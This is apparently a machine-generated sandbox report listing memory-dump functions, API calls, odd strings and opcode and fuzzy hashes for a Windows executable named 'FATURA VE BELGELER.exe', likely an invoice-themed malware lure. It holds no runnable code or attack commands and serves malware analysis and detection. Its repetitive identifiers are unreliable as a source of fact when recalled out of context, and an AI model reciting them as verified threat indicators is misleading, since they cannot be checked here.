Instruction ID: c050fc819ff8c392a77fbe56dd30c7103f5307e34f595b8e25a6efa72597ca8d
Opcode Fuzzy Hash: f7dbd26b4a2855020c072778d2208d8b91cfa61d757c7a2e0d83a7e7d7d6ba72
Instruction Fuzzy Hash: D71137758002499FCB10DFAAC844AEEBFF5EF48320F108419E519A7250C779A544CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04B21DB0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,04B21C69,?,?), ref: 04B21E10

Memory Dump Source

Source File: 00000000.00000002.1990303500.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_FATURA VE BELGELER.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d2cfdf4068d5bc37111fe50f214ef8e0685e29c850fdc8856b3035bb9197a258
Instruction ID: 48aeede4a641c9453f2bc0135e82e531970b7fdabc3f44394d6036310069ed33
Opcode Fuzzy Hash: d2cfdf4068d5bc37111fe50f214ef8e0685e29c850fdc8856b3035bb9197a258
Instruction Fuzzy Hash: 3B1136B5800249CFDB20DF99D585BDEBBF4EB48320F24845AD958A7340C778A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04B21094 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,04B21C69,?,?), ref: 04B21E10

Memory Dump Source

Source File: 00000000.00000002.1990303500.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_FATURA VE BELGELER.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: f53757320756e04e2e0481ab316a018b0a861148bd489ac87ca967c79d630030
Instruction ID: 6488e37c2174f94e40c5d71dfe1b21b670d23928ee2f4c21c89c662dea668251
Opcode Fuzzy Hash: f53757320756e04e2e0481ab316a018b0a861148bd489ac87ca967c79d630030
Instruction Fuzzy Hash: CF1125B5800249CFDB20DF9AC544BEEBBF4EB48320F10845AD958A7240D778A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06CCDA91 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 06CCDAFA

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: bf182255bf2e8849c23710f23c9c40469684005e1f2edde3de2548d8ae018d47
Instruction ID: c8023dc83d7f797a252bb6b36d79a563c23b982d5bad5e1c93a2da2a12e2ff87
Opcode Fuzzy Hash: bf182255bf2e8849c23710f23c9c40469684005e1f2edde3de2548d8ae018d47
Instruction Fuzzy Hash: 711146B1D002488BCB10DFAAC4847EEFBF5EF88324F208819D519A7240CB79A545CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 06CCDA98 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 06CCDAFA

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: cdb827dc67c006dc9636f9acbe750b19e9b5c8ad29dddf19e49c57b27e73c4ef
Instruction ID: dcaf10c37886a838a9c09fbed6ca086c08810a056faaf0a9ffde51c4703400e8
Opcode Fuzzy Hash: cdb827dc67c006dc9636f9acbe750b19e9b5c8ad29dddf19e49c57b27e73c4ef
Instruction Fuzzy Hash: F1113AB1D002488FCB10DFAAC4457EEFBF5EF88324F208419D519A7240CB79A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 028AB080 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 028AB0E6

Memory Dump Source

Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9fcb6122cccbcc23fa6f0f077bb10b61153d30b63fb5c7783d9ee56180246b2a
Instruction ID: cb4bf9a15bc107096b982a5fc5b7a7cfd260f8791b152cdb7030c52c8972cfba
Opcode Fuzzy Hash: 9fcb6122cccbcc23fa6f0f077bb10b61153d30b63fb5c7783d9ee56180246b2a
Instruction Fuzzy Hash: 4B110FB9C003498FDB20DF9AD444A9EFBF4EF89214F10842AD528A7200C779A549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04B202BA Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04B2031D

Memory Dump Source

Source File: 00000000.00000002.1990303500.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_FATURA VE BELGELER.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: eeeea0ea05cbc349650216dcec9928c71703dbc66139093a3f4dd4458bfe9f99
Instruction ID: ce2a2f1e9cfb0a119d014afe09ce6e6f2d4547aa3db7c370b80aab48f6f50970
Opcode Fuzzy Hash: eeeea0ea05cbc349650216dcec9928c71703dbc66139093a3f4dd4458bfe9f99
Instruction Fuzzy Hash: FA11F2B5800259CFDB10DF99D584BDFBBF8EB48320F10845AE659A7650C379A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04B202C0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04B2031D

Memory Dump Source

Source File: 00000000.00000002.1990303500.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_FATURA VE BELGELER.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a934f67d20d1fba950618fea4ddd544452e4fb684658f674e18948521094235a
Instruction ID: b58577c3525a67ceea329e9d17dbca5c044e1bd1377c835345b8ea26f10f8a58
Opcode Fuzzy Hash: a934f67d20d1fba950618fea4ddd544452e4fb684658f674e18948521094235a
Instruction Fuzzy Hash: 7711D0B58003499FDB10DF9AD985BDEFBF8EB48320F10845AE658A7200C379A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0284D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987794344.000000000284D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0284D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_284d000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9e1727509a75f1f993b4dcf3de898389bdad1c26d15b18a302b10dc68b86c34
Instruction ID: 650987d3b932abc05d4ae0838a1eb592372c4f29602e9954506b286738e4ea1a
Opcode Fuzzy Hash: d9e1727509a75f1f993b4dcf3de898389bdad1c26d15b18a302b10dc68b86c34
Instruction Fuzzy Hash: FE213479600248DFDB05DF14D9C0F26BF65FB88318F20C5A9E9098B256CB3AD416CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0284D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987794344.000000000284D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0284D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_284d000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6087f3024813018b2a741091c8fedc0ac55181f06a7b965d27cf4f69ddf3412d
Instruction ID: 5c0a619f65608de41635d189f70d4d52e8f5f8a66330b1a7ac2ce3118634a1c3
Opcode Fuzzy Hash: 6087f3024813018b2a741091c8fedc0ac55181f06a7b965d27cf4f69ddf3412d
Instruction Fuzzy Hash: 6C21487D500208DFDB09DF14C9C0F16BF65FB98328F60C169E9098B256C73AE416C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0285D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987822617.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_285d000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 085e9fd3d5e849b4d02e1312b14d2e57fd95e2aa3ca371766e1051e1eb57dfb4
Instruction ID: 1c4b5dbbc9ffb69ab075e388a43265c71787f5fd52fbef859250912a326c7382
Opcode Fuzzy Hash: 085e9fd3d5e849b4d02e1312b14d2e57fd95e2aa3ca371766e1051e1eb57dfb4
Instruction Fuzzy Hash: 2921F279504204EFDB05DF24D9C0B26BBA5FB88318F20C56DED098B356C37AE446CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0285D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987822617.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_285d000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6cc4a801cd0c178c31ab6497e2eba9880a1a5fbeb70350082bab5cafa87c34e
Instruction ID: b7b38c2ed999b3508b1a8b2cb3a4b5ce419bd61b70b99dcf3ca5b67dc6ec68fa
Opcode Fuzzy Hash: e6cc4a801cd0c178c31ab6497e2eba9880a1a5fbeb70350082bab5cafa87c34e
Instruction Fuzzy Hash: D621D07D604204DFDB14DF24D984B26BF65EF88318F20C569DD0A8B356C33AD407CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0285D005 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987822617.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_285d000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 159f2c598822608be28ecdb1db7b821ba5be664cfdc496cb5bb9eaeeaa91bd8c
Instruction ID: 5f1cc7fbcf087f02b77a9bce584ef0c0ba3ffac5280dbde66d0a9e1a142a8827
Opcode Fuzzy Hash: 159f2c598822608be28ecdb1db7b821ba5be664cfdc496cb5bb9eaeeaa91bd8c
Instruction Fuzzy Hash: 1C2162795093808FDB16CF24D994B15BF71EF46214F28C5EADC498B6A7C33A940ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0284D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987794344.000000000284D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0284D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_284d000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: c9ac03e5c98622f5c41c81111578e069ae78a3df510cde9d6f75359b302fc279
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 9711267A404244CFCB06CF10D5C4B16BF71FB94324F24C6A9DD094B256C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0284D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987794344.000000000284D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0284D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_284d000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: a7c8e9d808cf2e0ea4c523e0bc2dae74a86dc9cfa7f8c3eed70dfcff1e21d39b
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 3E11267A504284CFCB02CF10D5C4B16BF71FB88318F24C6A9D8494B256C336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0285D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987822617.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_285d000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 63c309e75b8af5c33f41c61857115a733919d42faee320f3b3d4d87a44e7de33
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: FC118B79504280DFDB16CF14D5C4B15BBA2FB84214F24C6ADDC498B696C33AE44ACB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 06CCB638 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

:;, xrefs: 06CCB693

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: :;
API String ID: 0-904211322
Opcode ID: ef5aafa9bee6e57823f58cfc2dd42aa9d2c36fe0ef14eb5ef77fc8a72f367eda
Instruction ID: a34b81b58122e71dfc59f317c3edbd9aea6a359645a6d166513189e79be1d82f
Opcode Fuzzy Hash: ef5aafa9bee6e57823f58cfc2dd42aa9d2c36fe0ef14eb5ef77fc8a72f367eda
Instruction Fuzzy Hash: 05E11A74E001198FCB14DFA9C5819AEFBB2FF88315F248169D415AB356DB31AD82CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05030040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1990503958.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a4d0d4a97f0262507d3aa6293c6c57c8eb0442de69522b71a905f84a8358a51
Instruction ID: 6c75779723f7296268646fb44094d7f0a8e47ad37dde8c42669691f285142162
Opcode Fuzzy Hash: 1a4d0d4a97f0262507d3aa6293c6c57c8eb0442de69522b71a905f84a8358a51
Instruction Fuzzy Hash: 3C1296B8C817458AEB10CF25F84C1893BB1B755318BF04A29D2617B6E5DBBC35AACF44

Uniqueness

Uniqueness Score: -1.00%

Function 06CCD270 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9eb0303c69eb7a591ba6e5ebe147e056d8f3486a828c0e37e758ae7e46fc80d
Instruction ID: eff710b0665117598d89a810c4cb3d55def96ee13cc69189ae8791cff217a683
Opcode Fuzzy Hash: e9eb0303c69eb7a591ba6e5ebe147e056d8f3486a828c0e37e758ae7e46fc80d
Instruction Fuzzy Hash: 21E13CB4E001198FCB14DFA9C5809AEFBF2FF89315F248169D415A7356DB31A982CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06CCB200 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9851786c1779929834be4d7e113810fa848ba30a4d5bc0230039d6e3022ecdfc
Instruction ID: 904a10759238d213eee20a1ab6dff4b438b85b9913d6eff52b402700e166782b
Opcode Fuzzy Hash: 9851786c1779929834be4d7e113810fa848ba30a4d5bc0230039d6e3022ecdfc
Instruction Fuzzy Hash: DEE13B74E001198FCB14DFA9C5819AEFBB2FF89315F248169D405AB356DB31AD82CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06CCADC8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c447f544883ae05cf267fa2d73b748207db54f5749f4f2a73f1b62d78405c9f5
Instruction ID: 60bf4b14b22b57f1760e2bb105ff4416ebd62d37ee6866e0d713b8bdc61bfda2
Opcode Fuzzy Hash: c447f544883ae05cf267fa2d73b748207db54f5749f4f2a73f1b62d78405c9f5
Instruction Fuzzy Hash: 3BE12BB4E001198FCB14DFA9C5809AEFBB2FF89315F248169E415A7356D731AD81CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06CCBA70 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2958d2de3ec7476cf7fda4ef85ad7d565ebcd5a4523a619cc934c3773444d613
Instruction ID: b2820394e218fe45c21c4603662d8ce95f93300c6990beae2b42f4755f224ce1
Opcode Fuzzy Hash: 2958d2de3ec7476cf7fda4ef85ad7d565ebcd5a4523a619cc934c3773444d613
Instruction Fuzzy Hash: 11E12C74E001198FCB14DFA9C5819AEFBB2FF89315F248159D405AB35ADB31AD82CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06CC2F80 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a920971d353ca411b9d9835895f2c74c464dc0adebd33b95f8b20e7a17e86609
Instruction ID: 5314386019a1187968173abfa5a033c20adc1a74068db0225b50814740169d80
Opcode Fuzzy Hash: a920971d353ca411b9d9835895f2c74c464dc0adebd33b95f8b20e7a17e86609
Instruction Fuzzy Hash: DFD11835C2075A8ACB15EBA4D990A9DB771FF9A300F10879AD00977225FFB06AC9CB51

Uniqueness

Uniqueness Score: -1.00%

Function 028ADCD4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc14020af23920f7cebb41265b7690236b7b14b9198c71b0f6b622733c462fd0
Instruction ID: 8709716ff764b377facb9136e07d42c9af2f5b1242d3fa217e933ae891e721be
Opcode Fuzzy Hash: cc14020af23920f7cebb41265b7690236b7b14b9198c71b0f6b622733c462fd0
Instruction Fuzzy Hash: 4AA16A3AA006098FDF05DFB8D8505AEB7B2BF85304B14856AE905EB265DF35E916CF80

Uniqueness

Uniqueness Score: -1.00%

Function 06CC2F90 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f46176e6ce5ae57db8378387a661c1da875903d3af6c0221093e8e6ab901c9e0
Instruction ID: e92d81cbb7a4628677e1ec9119011af5a1feff3d37004a378815c0c27e93d68f
Opcode Fuzzy Hash: f46176e6ce5ae57db8378387a661c1da875903d3af6c0221093e8e6ab901c9e0
Instruction Fuzzy Hash: ECD11935C2075A8ACB15EB64D950A9DF771FF96300F10879AD00977225FFB06AC5CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05030006 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1990503958.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aadaf334f1a97771c33b422a18360c5aa59ea6ef394f558d6051b8c8bc1d797d
Instruction ID: 88e7b41424440e1b5dd282067cd9b61f6f6f088119bfd5f5aad440d76852b3f3
Opcode Fuzzy Hash: aadaf334f1a97771c33b422a18360c5aa59ea6ef394f558d6051b8c8bc1d797d
Instruction Fuzzy Hash: DFC13CB8C817458FEB11CF24E8481897BB1BB85314FB04A29D2617B2E5DBBC356ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 06CCB1F0 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8297a575ade1bd23e4a1e94ee3901582feed92347fa37c585d71e3753a0cacb6
Instruction ID: e5a605dddd41ddba77d3cc9358bd47cdc78c01f661b8479b494cffa96b285773
Opcode Fuzzy Hash: 8297a575ade1bd23e4a1e94ee3901582feed92347fa37c585d71e3753a0cacb6
Instruction Fuzzy Hash: 27510A74E002198FDB14CFA9C5815AEFBF2FF89315F248169D418A7256DB319E42CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06CCF53B Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94259f3031b45c7af20f1ee9603142c2575c43b0e4facd64cfb0e7f6437e57c1
Instruction ID: 3a5746baf7d6df1ef624d8d90a80c82c0591b329458e538d706de5e72a205b21
Opcode Fuzzy Hash: 94259f3031b45c7af20f1ee9603142c2575c43b0e4facd64cfb0e7f6437e57c1
Instruction Fuzzy Hash: E1C01216E8E004EDDA414E8A24100F4F7BE8A4B031F4530AEC56DA35128694801855A8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: FATURA VE BELGELER..exePID: 6368, Parent PID: 6464COMMON

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	145
Total number of Limit Nodes:	15

Executed Functions

Function 02816790 Relevance: 6.7, Strings: 5, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 028169DA
,aq, xrefs: 02816A52
(o]q, xrefs: 02816D05
,aq, xrefs: 02816A60
(o]q, xrefs: 028169E8

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-615190528
Opcode ID: 7c3993da3bf142fb2a42b9954d4304555d8862297f1678d9c0c5a59017def8ca
Instruction ID: fb2f15d2198720734f11377a8f0c294f09c316c9736b1b4c846781b9d866caad
Opcode Fuzzy Hash: 7c3993da3bf142fb2a42b9954d4304555d8862297f1678d9c0c5a59017def8ca
Instruction Fuzzy Hash: 38125078A00229DFDB14CF69C984AADBBFAFF48304F558469E449EB2A5E734D841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0281B388 Relevance: 6.6, Strings: 5, Instructions: 353
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0281B7A7
Lj@p, xrefs: 0281B745
0o@p, xrefs: 0281B5C2
Lj@p, xrefs: 0281B72F
PH]q, xrefs: 0281B7B8

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 322574a15060ad6cfa9a34b756d719bd4bdcd51e070476283e435a930b0cb919
Instruction ID: 5dcc35a14072372b3a072f6adb34f5f328cd9404d1da33c481132a43c178cc46
Opcode Fuzzy Hash: 322574a15060ad6cfa9a34b756d719bd4bdcd51e070476283e435a930b0cb919
Instruction Fuzzy Hash: 17E10A78A00258CFDB14CFA9D984A9DBBB5FF58314F15C4A9E809EB3A1D734A841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0281BF10 Relevance: 6.4, Strings: 5, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0281C167
PH]q, xrefs: 0281C178
Lj@p, xrefs: 0281C0EF
0o@p, xrefs: 0281BF82
Lj@p, xrefs: 0281C105

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: b61c34808fd1f91bffc5234b934a3590f8de86e34a224105ab289b37d06bef68
Instruction ID: ab909e2116a54b72a4042f7fab5b76b78e094bd8496da926da4402a1c442e80b
Opcode Fuzzy Hash: b61c34808fd1f91bffc5234b934a3590f8de86e34a224105ab289b37d06bef68
Instruction Fuzzy Hash: 3781C578E412188FDB14DFAAD884A9DBBF2BF88304F14C06AE409EB265DB349945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0281BC32 Relevance: 6.4, Strings: 5, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0281BE87
Lj@p, xrefs: 0281BE25
0o@p, xrefs: 0281BCA2
PH]q, xrefs: 0281BE98
Lj@p, xrefs: 0281BE0F

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: bfdbf4a0242c041ab7b89f2caf18e27cc2c514333242dbd19fbfa38a9027d508
Instruction ID: 275f3704acff85efd601549696d48b22b08873da0137c456797dde37fb4bceb3
Opcode Fuzzy Hash: bfdbf4a0242c041ab7b89f2caf18e27cc2c514333242dbd19fbfa38a9027d508
Instruction Fuzzy Hash: A191A478E002189FDB14DFAAD984A9DBBF6FF88314F14C069E409EB265DB349945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0281C1F0 Relevance: 6.4, Strings: 5, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lj@p, xrefs: 0281C3CF
PH]q, xrefs: 0281C447
PH]q, xrefs: 0281C458
0o@p, xrefs: 0281C262
Lj@p, xrefs: 0281C3E5

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

